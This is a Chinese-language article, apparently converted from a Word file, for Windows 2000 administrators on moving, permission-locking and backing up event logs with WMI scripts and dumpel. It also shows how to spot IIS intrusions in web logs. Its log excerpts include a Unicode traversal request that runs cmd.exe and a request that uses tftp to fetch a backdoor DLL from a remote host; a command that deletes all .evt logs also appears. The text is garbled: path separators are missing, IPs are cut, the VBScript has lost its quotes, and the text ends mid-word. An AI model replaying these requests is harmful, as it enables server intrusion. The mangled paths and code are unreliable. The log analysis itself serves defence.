Windows 系统日志文件的保护.doc

Windows 系统日志文件的保护、备份和分析Windows系统以它的易用性倍受网管员的青睐，国内相当部分的大型网站都是用Windows 2000/XP系统建立的。Windows系统使用的人多了，研究它安全的人也多了。在此我要提醒一下网管们，虽然你补上了所有的安全补丁，但是谁又知道新的漏洞何时又会被发现呢？所以也应该做好系统日志的保护工作。 作为黑客，他们也是最关心系统日志的，一旦他们入侵成功，要做的第一件事就是删除你的日志文件，使你在被入侵后无法追踪黑客行为，以及检查黑客所做的操作行为。日志文件就像飞机中的“黑匣子”一样重要，因为里面保存着黑客入侵行为的所有罪证。 日志的移位与保护 Windows 2000的系统日志文件包括：应用程序日志、安全日志、系统日志、DNS服务日志，以及FTP连接日志和HTTPD日志等。在默认情况下日志文件大小为512KB，日志保存的默认的位置如下： 安全日志文件：%systemroot%system32config SecEvent.EVT 系统日志文件：%systemroot%system32config SysEvent.EVT 应用程序日志文件：%systemroot%system32config AppEvent.EVT FTP连接日志和HTTPD事务日志：%systemroot% system32LogFiles，下面还有子文件夹，分别对应该FTP和Web服务的日志，其对应的后缀名为.Log。 在此笔者把系统默认为.EVT扩展名的日志文件统称为事件日志，笔者看了好多文章介绍对事件日志移位能做到很好的保护。移位虽是一种保护方法，但只要在命令行输入dirc:*.evt/s（如系统安装在D盘，则盘符为D），一下就可查找到事件日志位置。日志移位要通过修改注册表来完成，我们找到注册表HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlog位置，下面的Application、Security、System几个子键，分别对应“应用程序日志”、“安全日志”、“系统日志”。如何修改注册表，下面我们来看看Application子键，如图1所示。 图1File项就是“应用程序日志”文件存放的位置，把此键值改为我们要存放日志文件的文件夹，然后再把%systemroot%system32configappevent.evt文件拷贝到此文件夹，再重启机器。在此介绍移位的目的是为了充分利用Windows 2000在NTFS格式下的“安全”属性，如果不移位也无法对文件进行安全设置操作，右击移位后的文件夹选择“属性”，进入“安全”选项卡，不选择“允许将来自父系的可继承权限传播给该对象”，添加“System”组，分别给Everyone组“读取”权限，System组选择除“完全控制”和“修改”的权限。然后再将系统默认的日志文件512KB大小改为你所想要的大小，如20MB。 进行了上面的设置后，再直接通过Del C:*.Evt/s/q来删除是删不掉的；对系统正在使用的记录文件在命令行形式中用上面的命令也是拒绝操作的。 日志文件的备份 基于WMI技术的日志备份脚本WMI（Windows Management Instrumentation）技术是微软提供的Windows下的系统管理工具，基于WMI开发的脚本均可在Windows 2000/NT上成功运行。微软提供了一个脚本，利用WMI将日志文件大小设为25MB，并允许日志自动覆盖14天前的日志。 我们只需把该脚本保存为.vbs扩展名的文件就可以使用，我们还可以修改上面的脚本来备份日志文件，笔者在此建议，在备份日志时一定将EVT的后缀名改为其他后缀保存（如.C），目的是让攻击者不易找到。 通过dumpel工具的备份 可用微软Resource Kit工具箱中的dumpel.exe工具备份日志文件，其格式为： dumpel -f file -s server -l log -m source -e n1 n2 n3. -r -t -dx-s server 输出远程计算机日志，如果是本地，这个可以省略。 -f filename 输出日志的位置和文件名。 -l log log 可选为System，Security，Application,可能还有别的如DNS等。 如要把目标服务器Server上的系统日志转存为Systemlog.log可以用如下格式： dumpel server -l system -f Systemlog.log如果利用计划任务还可以实现定期备份系统日志。 HTTPD事务日志的分析 Microsoft的IIS5自公布到现在，被黑客利用的漏洞是很多的，像.ida/.idq、unicode、WebDavx3和一些未知的漏洞，我们备份日志的目的就是为了分析黑客入侵的行为，对于没有打好补丁包的系统被黑客成功入侵的日志记录分别对应如下。 unicode漏洞入侵日志记录 我们打开IIS5的Web服务的日志文件,日志文件默认位置在%systemroot%system32LogFiles文件夹下，如图2所示是一个典型的Unicode漏洞入侵行为的日志记录，对于正常的Web访问，是通过80端口用GET命令获取Web数据，但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此洞。 图2如通过下面的编码查看目标机的目录文件： GET /_vti_bin/.%5c./.%5c./.%5c./winnt/system32/cmd.exe /c+dir200则日志中会记录下此访问行为： 2003-03-01 08:47:47 - 18 80 GET /_vti_bin/.%5c./.%5c./.%5c./winnt/system32/cmd.exe /c+dir 200 -然而我们的日志中记录的一清二楚，是来自的攻击者查看我们的目录。而下面一行是向我们的机器传送后门程序的记录： 2003-03-01 08:47:47 - 18 80 GET /_vti_bin/.%5c./.%5c./.%5c./winnt/system32/cmd.exe/c+tftp%20-i%2029%20GET%20cool.dll%20c:httpodbc.dll 502 -WebDavx3远程溢出日志记录 最近在黑客界有名的Wevdavx3漏洞是应用最广泛的，连打了最新SP3补丁的系统也不放过。如果系统遭受了此远程溢出的攻击行为，则日志记录如图3所示。 图3我们看到图中这样的一行信息： 2003-04-18 07:20:13 18 - 18 80 LOCK/AAAAA就表示我们的Web服务受到了来自18的攻击,并锁定(即关闭)了WEB服务。后面的一些乱码字符是在溢出攻击时使用的偏移位猜过程。 上面都记录了入侵行为的IP地址，此IP地址并不能排除是攻击者使用了跳板，也就是说此IP很可能是“肉鸡”而不是攻击者的IP，但再查看其他日志文件，还是有可能追查出攻击者的位置。日志的查询与备份:一个优秀的管理员是应该养成备份日志的习惯，如果有条件的话还应该把日志转存到备份机器上或直接转储到打印机上，笔者还有一篇文章利用脚本编程格式化输出系统日志，详细的讲述了利用windows脚本把日志转储并输出成html页已便于查询，有兴趣的可以查看，在这里推荐微软的resourceKit工具箱中的dumpel.exe，他的常用方法:dumpel -f filename -s server -l log-f filename 输出日志的位置和文件名-s server 输出远程计算机日志-l log log 可选的为system,security,application,可能还有别的如DNS等如要把目标服务器server上的系统日志转存为backupsystem.log可以用以下格式:dumpel server -l system -f backupsystem.log再利用计划任务可以实现定期备份系统日志。另外利用脚本编程的VMI对象也可以轻而易举的实现日志备份:下面给出备份application日志的代码:backuplog.vbsstrComputer = .Set objWMIService = GetObject(winmgmts: _& impersonationLevel=impersonate,(Backup)! & _strComputer & rootcimv2) 获得 VMI对象Set colLogFiles = objWMIService.ExecQuery _(Select * from Win32_NTEventLogFile where LogFileName=Application) 获取日志对象中的应用程序日志For Each objLogfile in colLogFileserrBackupLog = objLogFile.BackupEventLog(f:application.evt) 将日志备份为f:application.evtIf errBackupLog 0 ThenWscript.Echo The Application event log could not be backed up.else Wscript.Echo suc